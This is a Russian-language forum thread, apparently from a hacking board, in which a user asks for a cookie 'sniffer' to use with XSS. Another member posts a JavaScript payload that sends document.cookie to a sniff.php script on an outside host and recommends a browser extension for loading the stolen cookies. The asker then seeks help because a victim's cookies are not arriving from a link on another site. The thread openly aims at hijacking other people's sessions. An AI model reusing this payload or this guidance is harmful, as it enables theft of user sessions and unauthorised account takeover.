Здравствуйте уважаемые форумчане может есть у кого нибудь снифер для кражи куки через хсс поделитесь пж заранее спасибо

PHP:


Отправляем на него:

img = new Image();img.src="https://site.com/sniff.php?cookie="+document.cookie;

winstrool said:
↑ (https://antichat.live/posts/4460715/)

PHP:


Отправляем на него:
img = new Image();img.src="
https://site.com/sniff.php?cookie=
"+document.cookie;



Большое спасибо получилось ) Скажите пожалуйста куда подставлять полученные куки в opere

amanow said:
↑ (https://antichat.live/posts/4460725/)
Большое спасибо получилось ) Скажите пожалуйста куда подставлять полученные куки в opere


Такие простые вопросы можно и за гуглить, если не можете найти ответ потом уже спрашивайте на форуме, или сразу задавайте вопрос в развернутом виде

___addons.opera.com/ru/extensions/details/edit-this-cookie/

winstrool said:
↑ (https://antichat.live/posts/4460729/)
Такие простые вопросы можно и за гуглить, если не можете найти ответ потом уже спрашивайте на форуме, или сразу задавайте вопрос в развернутом виде
___addons.opera.com/ru/extensions/details/edit-this-cookie/



Я извиняюсь не подскажите есть сайт на котором есть xss когда я пишу alert(document.cookie) он мне показыват мои куки но когда я пишу ваш код и даю жертве ссылку и он по ней переходит его куки мне на хост не приходят почему

хоть кто нибудь помогите пожалуйста

Я же выше писал:


img = new Image();img.src="
https://site.com/sniff.php?cookie=
"+document.cookie;


Ну а дальше по ситуации, смотря какие обстоятельства...

я создал на хосте скрипт snif.php поставил ваш код в этот файл проверил скрпит на своем сайте где тоже есть xss куки пришли НО когда я даю жертве на другом сайте ссылку на уязвимую страницу куки не приходят ) подумал может нету тут xss закрыли и просто ради интиреса на форуме того сайта написал alert(document.cookie) сайт показывает мне мои куки